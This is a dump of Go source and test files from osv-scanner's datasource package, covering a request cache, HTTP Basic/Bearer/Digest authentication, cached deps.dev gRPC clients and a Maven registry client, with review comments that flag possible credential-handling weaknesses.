func (rq *RequestCache[K, V]) GetMap() map[K]V { rq.mu.Lock() defer rq.mu.Unlock() return maps.Clone(rq.cache) } // SetMap loads (a shallow clone of) the provided map into the cache map. func (rq *RequestCache[K, V]) SetMap(m map[K]V) { rq.mu.Lock() defer rq.mu.Unlock() rq.cache = maps.Clone(m) } ================================================ FILE: internal/datasource/cache_test.go ================================================ package datasource_test import ( "maps" "sync" "sync/atomic" "testing" "github.com/google/osv-scanner/v2/internal/datasource" ) func TestRequestCache(t *testing.T) { // Test that RequestCache calls each function exactly once per key. t.Parallel() requestCache := datasource.NewRequestCache[int, int]() const numKeys = 20 const requestsPerKey = 50 var wg sync.WaitGroup var fnCalls [numKeys]int32 for i := range numKeys { for range requestsPerKey { wg.Go(func() { t.Helper() //nolint:errcheck requestCache.Get(i, func() (int, error) { // Count how many times this function gets called for this key, // then return the key as the value. 
atomic.AddInt32(&fnCalls[i], 1) return i, nil }) }) } } wg.Wait() // Make sure all the goroutines are finished for i, c := range fnCalls { if c != 1 { t.Errorf("RequestCache Get(%d) function called %d times", i, c) } } cacheMap := requestCache.GetMap() if len(cacheMap) != numKeys { t.Errorf("RequestCache GetMap length was %d, expected %d", len(cacheMap), numKeys) } for k, v := range cacheMap { if k != v { t.Errorf("RequestCache GetMap key %d has unexpected value %d", k, v) } } } func TestRequestCacheSetMap(t *testing.T) { t.Parallel() requestCache := datasource.NewRequestCache[string, string]() requestCache.SetMap(map[string]string{"foo": "foo1", "bar": "bar2"}) fn := func() (string, error) { return "CACHE MISS", nil } want := map[string]string{ "foo": "foo1", "bar": "bar2", "baz": "CACHE MISS", "FOO": "CACHE MISS", } for k, v := range want { got, err := requestCache.Get(k, fn) if err != nil { t.Errorf("Get(%v) returned an error: %v", v, err) } else if got != v { t.Errorf("Get(%v) got: %v, want %v", k, got, v) } } gotMap := requestCache.GetMap() if !maps.Equal(want, gotMap) { t.Errorf("GetMap() got %v, want %v", gotMap, want) } } ================================================ FILE: internal/datasource/http_auth.go ================================================ package datasource import ( "bytes" "context" "crypto/md5" //nolint:gosec // used in Digest access authentication algorithm "crypto/rand" "encoding/base64" "encoding/hex" "fmt" "net/http" "slices" "strings" "sync/atomic" ) type HTTPAuthMethod int const ( AuthBasic HTTPAuthMethod = iota AuthBearer AuthDigest ) // HTTPAuthentication holds the information needed for general HTTP Authentication support. // Requests made through this will automatically populate the relevant info in the Authorization headers. // This is a general implementation and should be suitable for use with any ecosystem. 
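type HTTPAuthentication struct {
	SupportedMethods []HTTPAuthMethod // In order of preference, only one method will be attempted.

	// AlwaysAuth determines whether to always send auth headers.
	// If false, the server must respond with a WWW-Authenticate header which will be checked for supported methods.
	// Must be set to false to use Digest authentication.
	AlwaysAuth bool

	// Shared
	Username string // Basic & Digest, plain text.
	Password string // Basic & Digest, plain text.
	// Basic
	BasicAuth string // Base64-encoded username:password. Overrides Username & Password fields if set.
	// Bearer
	BearerToken string
	// Digest
	CnonceFunc func() string // Function used to generate cnonce string for Digest. OK to leave unassigned. Mostly for use in tests.

	// The last-used authentication method - used when AlwaysAuth is false to automatically send Basic auth.
	// It is stored once per HTTPAuthentication value and is not keyed by host or URL.
	lastUsed atomic.Value
}

// Get makes an http GET request with the given http.Client.
// The Authorization Header will automatically be populated according to the fields in the HTTPAuthentication.
//
// A nil receiver sends the request without authentication.
// With AlwaysAuth set, the first method in SupportedMethods that has credentials configured is sent
// up front; Digest is skipped there because it needs a server challenge.
// Otherwise the request is first sent without credentials (or with the Basic/Bearer header, if that
// method led to a 200 on an earlier call) and, on a 401, retried once with the first supported method
// that the WWW-Authenticate header offers. If no method applies, the original 401 response is returned.
//
// On success the caller owns the returned response and must close its body.
//
// NOTE(review): nothing in this method looks at the scheme or host of url before attaching
// credentials. AlwaysAuth and the lastUsed shortcut both add the Basic/Bearer header to whatever URL
// is passed in, and the 401 retry answers any server that asks for a supported scheme. Basic and
// Bearer headers are reusable by whoever reads them, so callers should keep one HTTPAuthentication
// per registry host and only hand it https URLs for that host.
func (auth *HTTPAuthentication) Get(ctx context.Context, httpClient *http.Client, url string) (*http.Response, error) {
	req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
	if err != nil {
		return nil, err
	}

	// For convenience, have the nil HTTPAuthentication just make an unauthenticated request.
	if auth == nil {
		return httpClient.Do(req)
	}

	if auth.AlwaysAuth {
		for _, method := range auth.SupportedMethods {
			ok := false
			switch method {
			case AuthBasic:
				ok = auth.addBasic(req)
			case AuthBearer:
				ok = auth.addBearer(req)
			case AuthDigest:
				// AuthDigest needs a challenge from WWW-Authenticate, so we cannot always add the auth.
			}
			// Stop at the first method that actually produced a header.
			if ok {
				break
			}
		}

		return httpClient.Do(req)
	}

	// If the last request we made to this server used Basic or Bearer auth, send the header with this request
	// (lastUsed is shared by every URL requested through this HTTPAuthentication, see the note above).
	if lastUsed, ok := auth.lastUsed.Load().(HTTPAuthMethod); ok {
		switch lastUsed {
		case AuthBasic:
			auth.addBasic(req)
		case AuthBearer:
			auth.addBearer(req)
		case AuthDigest:
			// Cannot add AuthDigest without the challenge from the initial request.
		}
	}

	resp, err := httpClient.Do(req)
	if err != nil {
		return nil, err
	}
	if resp.StatusCode != http.StatusUnauthorized {
		return resp, nil
	}

	wwwAuth := resp.Header.Values("WWW-Authenticate")

	ok := false
	var usedMethod HTTPAuthMethod
	// Build a fresh request for the retry so it carries only the header chosen below.
	req, err = http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
	if err != nil {
		return nil, err
	}
	for _, method := range auth.SupportedMethods {
		switch method {
		case AuthBasic:
			if auth.authIndex(wwwAuth, "Basic") >= 0 {
				ok = auth.addBasic(req)
			}
		case AuthBearer:
			if auth.authIndex(wwwAuth, "Bearer") >= 0 {
				ok = auth.addBearer(req)
			}
		case AuthDigest:
			if idx := auth.authIndex(wwwAuth, "Digest"); idx >= 0 {
				ok = auth.addDigest(req, wwwAuth[idx])
			}
		}
		if ok {
			usedMethod = method
			break
		}
	}

	if ok {
		defer resp.Body.Close() // Close the original request before we discard it.
		resp, err = httpClient.Do(req)
		if err != nil {
			// A failed retry has no usable response, so return before its status code is read.
			return nil, err
		}
	}
	// Only remember a method once the server has accepted it.
	if resp.StatusCode == http.StatusOK {
		auth.lastUsed.Store(usedMethod)
	}
	// The original request's response will be returned if there is no matching methods.

	return resp, err
}

// authIndex returns the index of the first WWW-Authenticate value whose scheme is authScheme, or -1.
// The scheme is the text before the first space of each value, so a value that lists several
// challenges is only recognised by its first one.
// Scheme names are compared case-insensitively, as HTTP defines them (RFC 9110, section 11.1).
func (auth *HTTPAuthentication) authIndex(wwwAuth []string, authScheme string) int {
	return slices.IndexFunc(wwwAuth, func(s string) bool {
		scheme, _, _ := strings.Cut(s, " ")
		return strings.EqualFold(scheme, authScheme)
	})
}

// addBasic sets a Basic Authorization header on req and reports whether it did.
// BasicAuth is used as-is when set; otherwise Username and Password must both be non-empty.
func (auth *HTTPAuthentication) addBasic(req *http.Request) bool {
	if auth.BasicAuth != "" {
		req.Header.Set("Authorization", "Basic "+auth.BasicAuth)

		return true
	}

	if auth.Username != "" && auth.Password != "" {
		authStr := base64.StdEncoding.EncodeToString([]byte(auth.Username + ":" + auth.Password))
		req.Header.Set("Authorization", "Basic "+authStr)

		return true
	}

	return false
}

// addBearer sets a Bearer Authorization header on req when BearerToken is non-empty and reports whether it did.
func (auth *HTTPAuthentication) addBearer(req *http.Request) bool {
	if auth.BearerToken != "" {
		req.Header.Set("Authorization", "Bearer "+auth.BearerToken)

		return true
	}

	return false
}

// addDigest answers a Digest challenge by adding an Authorization header to req.
// It reports false, leaving req untouched, when Username or Password is empty, when the challenge
// has no realm or nonce, when the algorithm is anything other than MD5, MD5-sess or unset, or when
// a qop list is present that does not contain "auth".
//
// MD5 is used because these Digest algorithms are defined in terms of it; the hash is there for
// protocol compatibility and the transport should still be protected by TLS.
//
// NOTE(review): realm, nonce and opaque are taken from the server's challenge and, like Username,
// are written into quoted header parameters without escaping '"' or '\' - confirm whether such
// values need to be escaped or rejected. opaque is also emitted (empty) when the challenge did not
// contain one.
func (auth *HTTPAuthentication) addDigest(req *http.Request, challenge string) bool {
	// Mostly following the algorithm as outlined in https://en.wikipedia.org/wiki/Digest_access_authentication
	// And also https://datatracker.ietf.org/doc/html/rfc2617
	if auth.Username == "" || auth.Password == "" {
		return false
	}
	params := auth.parseChallenge(challenge)
	realm, ok := params["realm"]
	if !ok {
		return false
	}

	nonce, ok := params["nonce"]
	if !ok {
		return false
	}
	var cnonce string

	ha1 := md5.Sum([]byte(auth.Username + ":" + realm + ":" + auth.Password)) //nolint:gosec
	switch params["algorithm"] {
	case "MD5-sess":
		// MD5-sess folds the server nonce and a client nonce into HA1.
		cnonce = auth.cnonce()
		if cnonce == "" {
			return false
		}
		var b bytes.Buffer
		fmt.Fprintf(&b, "%x:%s:%s", ha1, nonce, cnonce)
		ha1 = md5.Sum(b.Bytes()) //nolint:gosec
	case "MD5":
	case "":
	default:
		// Any other algorithm is declined, so no Digest header is sent for it.
		return false
	}

	// Only support "auth" qop
	if qop, ok := params["qop"]; ok && !slices.Contains(strings.Split(qop, ","), "auth") {
		return false
	}

	// NOTE(review): only the path is signed and sent as uri. RFC 2617 describes digest-uri as the
	// Request-URI of the request line, which includes the query string - confirm that no URL
	// requested through here carries a query, otherwise the server's check may not match.
	uri := req.URL.Path // is this sufficient?

	ha2 := md5.Sum([]byte(req.Method + ":" + uri)) //nolint:gosec

	// hard-coding nonceCount to 1 since we don't make a request more than once
	nonceCount := "00000001"

	var b bytes.Buffer
	if _, ok := params["qop"]; ok {
		// The qop=auth form needs a client nonce; reuse the MD5-sess one if it was generated above.
		if cnonce == "" {
			cnonce = auth.cnonce()
			if cnonce == "" {
				return false
			}
		}
		fmt.Fprintf(&b, "%x:%s:%s:%s:%s:%x", ha1, nonce, nonceCount, cnonce, "auth", ha2)
	} else {
		// Challenge without qop: response is computed from HA1, nonce and HA2 only.
		fmt.Fprintf(&b, "%x:%s:%x", ha1, nonce, ha2)
	}
	response := md5.Sum(b.Bytes()) //nolint:gosec

	var sb strings.Builder
	fmt.Fprintf(&sb, "Digest username=\"%s\", realm=\"%s\", nonce=\"%s\", uri=\"%s\"", auth.Username, realm, nonce, uri)
	if _, ok := params["qop"]; ok {
		fmt.Fprintf(&sb, ", qop=auth, nc=%s, cnonce=\"%s\"", nonceCount, cnonce)
	}
	if alg, ok := params["algorithm"]; ok {
		fmt.Fprintf(&sb, ", algorithm=%s", alg)
	}
	fmt.Fprintf(&sb, ", response=\"%x\", opaque=\"%s\"", response, params["opaque"])

	req.Header.Add("Authorization", sb.String())

	return true
}

func (auth *HTTPAuthentication) parseChallenge(challenge string) map[string]string {
	// Parse the params out of the auth challenge header.
	// e.g. Digest realm="testrealm@host.com", qop="auth,auth-int" ->
	// {"realm": "testrealm@host.com", "qop", "auth,auth-int"}
	//
	// This isn't perfectly robust - some edge cases / weird headers may parse incorrectly.

	// Get rid of "Digest" prefix
	_, challenge, _ = strings.Cut(challenge, " ")

	parts := strings.Split(challenge, ",")
	// parts may have had a quoted comma, recombine if there's an unclosed quote.

	for i := 0; i < len(parts); {
		if strings.Count(parts[i], "\"")%2 == 1 && len(parts) > i+1 {
			parts[i] = parts[i] + "," + parts[i+1]
			parts = append(parts[:i+1], parts[i+2:]...)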
continue } i++ } m := make(map[string]string) for _, part := range parts { key, val, _ := strings.Cut(part, "=") key = strings.Trim(key, " ") val = strings.Trim(val, " ") // remove quotes from quoted string val = strings.Trim(val, "\"") m[key] = val } return m } func (auth *HTTPAuthentication) cnonce() string { if auth.CnonceFunc != nil { return auth.CnonceFunc() } // for a default nonce use a random 8 bytes b := make([]byte, 8) if _, err := rand.Read(b); err != nil { return "" } return hex.EncodeToString(b) } ================================================ FILE: internal/datasource/http_auth_test.go ================================================ package datasource_test import ( "net/http" "testing" "github.com/google/osv-scanner/v2/internal/datasource" ) // mockTransport is used to inspect the requests being made by HTTPAuthentications type mockTransport struct { Requests []*http.Request // All requests made to this transport UnauthedResponse *http.Response // Response sent when request does not have an 'Authorization' header. AuthedReponse *http.Response // Response to sent when request does include 'Authorization' (not checked). } func (mt *mockTransport) RoundTrip(req *http.Request) (*http.Response, error) { mt.Requests = append(mt.Requests, req) var resp *http.Response if req.Header.Get("Authorization") == "" { resp = mt.UnauthedResponse } else { resp = mt.AuthedReponse } if resp == nil { resp = &http.Response{StatusCode: http.StatusOK} } return resp, nil } func TestHTTPAuthentication(t *testing.T) { t.Parallel() tests := []struct { name string httpAuth *datasource.HTTPAuthentication requestURL string wwwAuth []string expectedAuths []string // expected Authentication headers received. 
expectedResponseCodes []int // expected final response codes received (length may be less than expectedAuths) }{ { name: "nil_auth", httpAuth: nil, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic"}, expectedAuths: []string{""}, expectedResponseCodes: []int{http.StatusUnauthorized}, }, { name: "default_auth", httpAuth: &datasource.HTTPAuthentication{}, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic"}, expectedAuths: []string{""}, expectedResponseCodes: []int{http.StatusUnauthorized}, }, { name: "basic_auth", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: true, Username: "Aladdin", Password: "open sesame", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ=="}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_from_token", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: true, Username: "ignored", Password: "ignored", BasicAuth: "QWxhZGRpbjpvcGVuIHNlc2FtZQ==", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ=="}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_missing_username", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: true, Username: "", Password: "ignored", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{""}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_missing_password", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: true, Username: "ignored", Password: "", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{""}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_not_always", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: 
[]datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: false, BasicAuth: "YTph", }, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic realm=\"User Visible Realm\""}, expectedAuths: []string{"", "Basic YTph"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "bearer_auth", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBearer}, AlwaysAuth: true, BearerToken: "abcdefgh", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{"Bearer abcdefgh"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "bearer_auth_not_always", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBearer}, AlwaysAuth: false, BearerToken: "abcdefgh", }, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Bearer"}, expectedAuths: []string{"", "Bearer abcdefgh"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "always_auth_priority", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic, datasource.AuthBearer}, AlwaysAuth: true, BasicAuth: "UseThisOne", BearerToken: "NotThisOne", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{"Basic UseThisOne"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "not_always_auth_priority", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBearer, datasource.AuthDigest, datasource.AuthBasic}, AlwaysAuth: false, Username: "DoNotUse", Password: "ThisField", BearerToken: "PleaseUseThis", }, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic", "Bearer"}, expectedAuths: []string{"", "Bearer PleaseUseThis"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "digest_auth", // Example from https://en.wikipedia.org/wiki/Digest_access_authentication#Example_with_explanation httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthDigest}, 
AlwaysAuth: false, Username: "Mufasa", Password: "Circle Of Life", CnonceFunc: func() string { return "0a4f113b" }, }, requestURL: "https://127.0.0.1/dir/index.html", wwwAuth: []string{ "Digest realm=\"testrealm@host.com\", " + "qop=\"auth,auth-int\", " + "nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", " + "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"", }, expectedAuths: []string{ "", // The order of these fields shouldn't actually matter "Digest username=\"Mufasa\", " + "realm=\"testrealm@host.com\", " + "nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", " + "uri=\"/dir/index.html\", " + "qop=auth, " + "nc=00000001, " + "cnonce=\"0a4f113b\", " + "response=\"6629fae49393a05397450978507c4ef1\", " + "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"", }, expectedResponseCodes: []int{http.StatusOK}, }, { name: "digest_auth_rfc2069", // old spec, without qop header httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthDigest}, AlwaysAuth: false, Username: "Mufasa", Password: "Circle Of Life", }, requestURL: "https://127.0.0.1/dir/index.html", wwwAuth: []string{ "Digest realm=\"testrealm@host.com\", " + "nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", " + "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"", }, expectedAuths: []string{ "", // The order of these fields shouldn't actually matter "Digest username=\"Mufasa\", " + "realm=\"testrealm@host.com\", " + "nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", " + "uri=\"/dir/index.html\", " + "response=\"670fd8c2df070c60b045671b8b24ff02\", " + "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"", }, expectedResponseCodes: []int{http.StatusOK}, }, { name: "digest_auth_mvn", // From what mvn sends. 
httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthDigest}, AlwaysAuth: false, Username: "my-username", Password: "cool-password", CnonceFunc: func() string { return "f7ef2d457dabcd54" }, }, requestURL: "https://127.0.0.1:41565/commons-io/commons-io/1.0/commons-io-1.0.pom", wwwAuth: []string{ "Digest realm=\"test@osv.dev\"," + "qop=\"auth\"," + "nonce=\"deadbeef\"," + "opaque=\"aaaa\"," + "algorithm=\"MD5-sess\"," + "domain=\"/test\"", }, expectedAuths: []string{ "", // The order of these fields shouldn't actually matter "Digest username=\"my-username\", " + "realm=\"test@osv.dev\", " + "nonce=\"deadbeef\", " + "uri=\"/commons-io/commons-io/1.0/commons-io-1.0.pom\", " + "qop=auth, " + "nc=00000001, " + "cnonce=\"f7ef2d457dabcd54\", " + "algorithm=MD5-sess, " + "response=\"15a35e7018a0fc7db05d31185e0d2c9e\", " + "opaque=\"aaaa\"", }, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_reuse_on_subsequent", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthDigest, datasource.AuthBasic}, AlwaysAuth: false, Username: "user", Password: "pass", }, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic realm=\"Realm\""}, expectedAuths: []string{"", "Basic dXNlcjpwYXNz", "Basic dXNlcjpwYXNz"}, expectedResponseCodes: []int{http.StatusOK, http.StatusOK}, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() mt := &mockTransport{} if len(tt.wwwAuth) > 0 { mt.UnauthedResponse = &http.Response{ StatusCode: http.StatusUnauthorized, Header: make(http.Header), } for _, v := range tt.wwwAuth { mt.UnauthedResponse.Header.Add("WWW-Authenticate", v) } } httpClient := &http.Client{Transport: mt} for _, want := range tt.expectedResponseCodes { resp, err := tt.httpAuth.Get(t.Context(), httpClient, tt.requestURL) if err != nil { t.Fatalf("error making request: %v", err) } defer resp.Body.Close() if resp.StatusCode != want { 
t.Errorf("authorization response status code got = %d, want %d", resp.StatusCode, want) } } if len(mt.Requests) != len(tt.expectedAuths) { t.Fatalf("unexpected number of requests got = %d, want %d", len(mt.Requests), len(tt.expectedAuths)) } for i, want := range tt.expectedAuths { got := mt.Requests[i].Header.Get("Authorization") if got != want { t.Errorf("authorization header got = \"%s\", want \"%s\"", got, want) } } }) } } ================================================ FILE: internal/datasource/insights.go ================================================ package datasource import ( "context" "crypto/x509" "fmt" "sync" "time" pb "deps.dev/api/v3" "google.golang.org/grpc" "google.golang.org/grpc/credentials" ) // CachedInsightsClient is a wrapper for InsightsClient that caches requests. type CachedInsightsClient struct { pb.InsightsClient // cache fields mu sync.Mutex cacheTimestamp *time.Time packageCache *RequestCache[packageKey, *pb.Package] versionCache *RequestCache[versionKey, *pb.Version] requirementsCache *RequestCache[versionKey, *pb.Requirements] } // Comparable types to use as map keys for cache. type packageKey struct { System pb.System Name string } func makePackageKey(k *pb.PackageKey) packageKey { return packageKey{ System: k.GetSystem(), Name: k.GetName(), } } type versionKey struct { System pb.System Name string Version string } func makeVersionKey(k *pb.VersionKey) versionKey { return versionKey{ System: k.GetSystem(), Name: k.GetName(), Version: k.GetVersion(), } } func NewCachedInsightsClient(addr string, userAgent string) (*CachedInsightsClient, error) { certPool, err := x509.SystemCertPool() if err != nil { return nil, fmt.Errorf("getting system cert pool: %w", err) } creds := credentials.NewClientTLSFromCert(certPool, "") dialOpts := []grpc.DialOption{grpc.WithTransportCredentials(creds)} if userAgent != "" { dialOpts = append(dialOpts, grpc.WithUserAgent(userAgent)) } conn, err := grpc.NewClient(addr, dialOpts...) 
if err != nil { return nil, fmt.Errorf("dialling %q: %w", addr, err) } return &CachedInsightsClient{ InsightsClient: pb.NewInsightsClient(conn), packageCache: NewRequestCache[packageKey, *pb.Package](), versionCache: NewRequestCache[versionKey, *pb.Version](), requirementsCache: NewRequestCache[versionKey, *pb.Requirements](), }, nil } func (c *CachedInsightsClient) GetPackage(ctx context.Context, in *pb.GetPackageRequest, opts ...grpc.CallOption) (*pb.Package, error) { return c.packageCache.Get(makePackageKey(in.GetPackageKey()), func() (*pb.Package, error) { return c.InsightsClient.GetPackage(ctx, in, opts...) }) } func (c *CachedInsightsClient) GetVersion(ctx context.Context, in *pb.GetVersionRequest, opts ...grpc.CallOption) (*pb.Version, error) { return c.versionCache.Get(makeVersionKey(in.GetVersionKey()), func() (*pb.Version, error) { return c.InsightsClient.GetVersion(ctx, in, opts...) }) } func (c *CachedInsightsClient) GetRequirements(ctx context.Context, in *pb.GetRequirementsRequest, opts ...grpc.CallOption) (*pb.Requirements, error) { return c.requirementsCache.Get(makeVersionKey(in.GetVersionKey()), func() (*pb.Requirements, error) { return c.InsightsClient.GetRequirements(ctx, in, opts...) 
}) } ================================================ FILE: internal/datasource/insights_cache.go ================================================ package datasource import ( "time" pb "deps.dev/api/v3" "google.golang.org/protobuf/proto" ) type depsdevAPICache struct { Timestamp *time.Time PackageCache map[packageKey][]byte VersionCache map[versionKey][]byte RequirementsCache map[versionKey][]byte } func protoMarshalCache[K comparable, V proto.Message](protoMap map[K]V) (map[K][]byte, error) { byteMap := make(map[K][]byte) for k, v := range protoMap { b, err := proto.Marshal(v) if err != nil { return nil, err } byteMap[k] = b } return byteMap, nil } func protoUnmarshalCache[K comparable, V any, PV interface { proto.Message *V }](byteMap map[K][]byte, protoMap *map[K]PV) error { *protoMap = make(map[K]PV) for k, b := range byteMap { v := PV(new(V)) if err := proto.Unmarshal(b, v); err != nil { return err } (*protoMap)[k] = v } return nil } func (c *CachedInsightsClient) GobEncode() ([]byte, error) { var cache depsdevAPICache c.mu.Lock() defer c.mu.Unlock() if c.cacheTimestamp == nil { now := time.Now().UTC() c.cacheTimestamp = &now } cache.Timestamp = c.cacheTimestamp var err error cache.PackageCache, err = protoMarshalCache(c.packageCache.GetMap()) if err != nil { return nil, err } cache.VersionCache, err = protoMarshalCache(c.versionCache.GetMap()) if err != nil { return nil, err } cache.RequirementsCache, err = protoMarshalCache(c.requirementsCache.GetMap()) if err != nil { return nil, err } return gobMarshal(cache) } func (c *CachedInsightsClient) GobDecode(b []byte) error { var cache depsdevAPICache if err := gobUnmarshal(b, &cache); err != nil { return err } if cache.Timestamp != nil && time.Since(*cache.Timestamp) >= cacheExpiry { // Cache expired return nil } c.mu.Lock() defer c.mu.Unlock() c.cacheTimestamp = cache.Timestamp var pkgMap map[packageKey]*pb.Package if err := protoUnmarshalCache(cache.PackageCache, &pkgMap); err != nil { return err } var verMap 
map[versionKey]*pb.Version if err := protoUnmarshalCache(cache.VersionCache, &verMap); err != nil { return err } var reqMap map[versionKey]*pb.Requirements if err := protoUnmarshalCache(cache.RequirementsCache, &reqMap); err != nil { return err } c.packageCache.SetMap(pkgMap) c.versionCache.SetMap(verMap) c.requirementsCache.SetMap(reqMap) return nil } ================================================ FILE: internal/datasource/insightsalpha.go ================================================ package datasource import ( "crypto/x509" "fmt" pb "deps.dev/api/v3alpha" "google.golang.org/grpc" "google.golang.org/grpc/credentials" ) // NewInsightsAlphaClient creates a deps.dev v3alpha InsightsClient with a custom address and userAgent. func NewInsightsAlphaClient(addr string, userAgent string) (pb.InsightsClient, error) { certPool, err := x509.SystemCertPool() if err != nil { return nil, fmt.Errorf("getting system cert pool: %w", err) } creds := credentials.NewClientTLSFromCert(certPool, "") dialOpts := []grpc.DialOption{grpc.WithTransportCredentials(creds)} if userAgent != "" { dialOpts = append(dialOpts, grpc.WithUserAgent(userAgent)) } conn, err := grpc.NewClient(addr, dialOpts...) 
if err != nil { return nil, fmt.Errorf("dialling %q: %w", addr, err) } return pb.NewInsightsClient(conn), nil } ================================================ FILE: internal/datasource/maven_registry.go ================================================ package datasource import ( "bytes" "context" "encoding/xml" "errors" "fmt" "io" "net/http" "net/url" "slices" "strings" "sync" "time" "deps.dev/util/maven" "deps.dev/util/semver" "golang.org/x/net/html/charset" ) const MavenCentral = "https://repo.maven.apache.org/maven2" var errAPIFailed = errors.New("API query failed") type MavenRegistryAPIClient struct { defaultRegistry MavenRegistry // The default registry that we are making requests registries []MavenRegistry // Additional registries specified to fetch projects registryAuths map[string]*HTTPAuthentication // Authentication for the registries keyed by registry ID. From settings.xml // Cache fields mu *sync.Mutex cacheTimestamp *time.Time // If set, this means we loaded from a cache responses *RequestCache[string, response] } type response struct { StatusCode int Body []byte } type MavenRegistry struct { URL string Parsed *url.URL // Information from pom.xml ID string ReleasesEnabled bool SnapshotsEnabled bool } func NewMavenRegistryAPIClient(registry MavenRegistry) (*MavenRegistryAPIClient, error) { if registry.URL == "" { registry.URL = MavenCentral registry.ID = "central" } u, err := url.Parse(registry.URL) if err != nil { return nil, fmt.Errorf("invalid Maven registry %s: %w", registry.URL, err) } registry.Parsed = u // TODO: allow for manual specification of settings files globalSettings := ParseMavenSettings(globalMavenSettingsFile()) userSettings := ParseMavenSettings(userMavenSettingsFile()) return &MavenRegistryAPIClient{ // We assume only downloading releases is allowed on the default registry. 
defaultRegistry: registry,
		mu:              &sync.Mutex{},
		responses:       NewRequestCache[string, response](),
		// Credentials from the global and user settings.xml, keyed by server ID.
		registryAuths: MakeMavenAuth(globalSettings, userSettings),
	}, nil
}

// WithoutRegistries makes MavenRegistryAPIClient including its cache but not registries.
// The returned client keeps the receiver's default registry and cache timestamp
// and shares its mutex and response cache (both are pointers).
// NOTE(review): registryAuths is not carried over, so the returned client looks
// credentials up in a nil map and finds none, including for the default
// registry. Confirm this is intended for an authenticated default registry.
func (m *MavenRegistryAPIClient) WithoutRegistries() *MavenRegistryAPIClient {
	return &MavenRegistryAPIClient{
		defaultRegistry: m.defaultRegistry,
		mu:              m.mu,
		cacheTimestamp:  m.cacheTimestamp,
		responses:       m.responses,
	}
}

// AddRegistry adds the given registry to the list of registries if it has not been added.
// Registries are de-duplicated by ID only: if an entry with the same ID already
// exists, the call returns nil without comparing URLs, so the first URL added
// for an ID is the one that stays. It returns the url.Parse error when
// registry.URL cannot be parsed.
// NOTE(review): m.registries is modified without holding m.mu; presumably
// registries are added before any concurrent requests are made. Verify.
func (m *MavenRegistryAPIClient) AddRegistry(registry MavenRegistry) error {
	for _, reg := range m.registries {
		if reg.ID == registry.ID {
			return nil
		}
	}

	u, err := url.Parse(registry.URL)
	if err != nil {
		return err
	}

	registry.Parsed = u
	m.registries = append(m.registries, registry)

	return nil
}

// GetRegistries returns the additional registries added through AddRegistry.
// The default registry is not included, and the slice returned is the client's
// own slice rather than a copy.
func (m *MavenRegistryAPIClient) GetRegistries() (registries []MavenRegistry) {
	return m.registries
}

// GetProject fetches a pom.xml specified by groupID, artifactID and version and parses it to maven.Project.
// Each registry in the list is tried until we find the project.
// For a snapshot version, version level metadata is used to find the exact version string.
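// More about Maven Repository Metadata Model: https://maven.apache.org/ref/3.9.9/maven-repository-metadata/
// More about Maven Metadata: https://maven.apache.org/repositories/metadata.html
//
// Additional registries are tried in the order they were added and the default
// registry is tried last; the first registry that yields a parsable pom.xml wins.
// Release versions are only requested from registries with ReleasesEnabled, and
// versions ending in "-SNAPSHOT" only from registries with SnapshotsEnabled.
// Per-registry errors are discarded, so the returned error does not identify
// which registry failed or why.
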